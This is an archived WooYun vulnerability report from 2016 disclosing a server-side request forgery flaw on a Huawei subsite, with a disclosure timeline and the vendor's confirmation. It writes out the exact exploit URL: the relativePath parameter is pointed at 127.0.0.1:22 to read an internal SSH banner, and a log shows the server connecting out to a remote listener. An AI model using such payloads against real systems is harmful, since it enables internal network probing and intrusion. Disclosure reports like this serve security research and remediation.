当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0214331

漏洞标题:华为某分站存在SSRF漏洞

相关厂商:华为技术有限公司

漏洞作者: 猪猪侠

提交时间:2016-05-30 10:32

修复时间:2016-07-15 10:20

公开时间:2016-07-15 10:20

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-30: 细节已通知厂商并且等待厂商处理中
2016-05-31: 厂商已经确认,细节仅向厂商公开
2016-06-10: 细节向核心白帽子及相关领域专家公开
2016-06-20: 细节向普通白帽子公开
2016-06-30: 细节向实习白帽子公开
2016-07-15: 细节向公众公开

简要描述:

华为某分站存在SSRF漏洞
看看有多少公司认为SSRF不算漏洞

详细说明:

#1 网站
http://hnc.huawei.com/
#2 SSRF地址
http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt
#3 参数
relativePath

漏洞证明:

http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt

SSH-2.0-WeOnlyDo 2.4.3


# 请求远程服务器

Connection from 117.78.9.4 port 8080 [tcp/webcache] accepted
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.6.0_43
Host: 119.29.29.29:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

修复方案:

把用于取外网资源的API部署在不属于自己的机房

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-05-31 10:16

厂商回复:

非常感谢猪猪侠对华为公司安全的关注,我们已通知项目组整改该问题。

最新状态:

暂无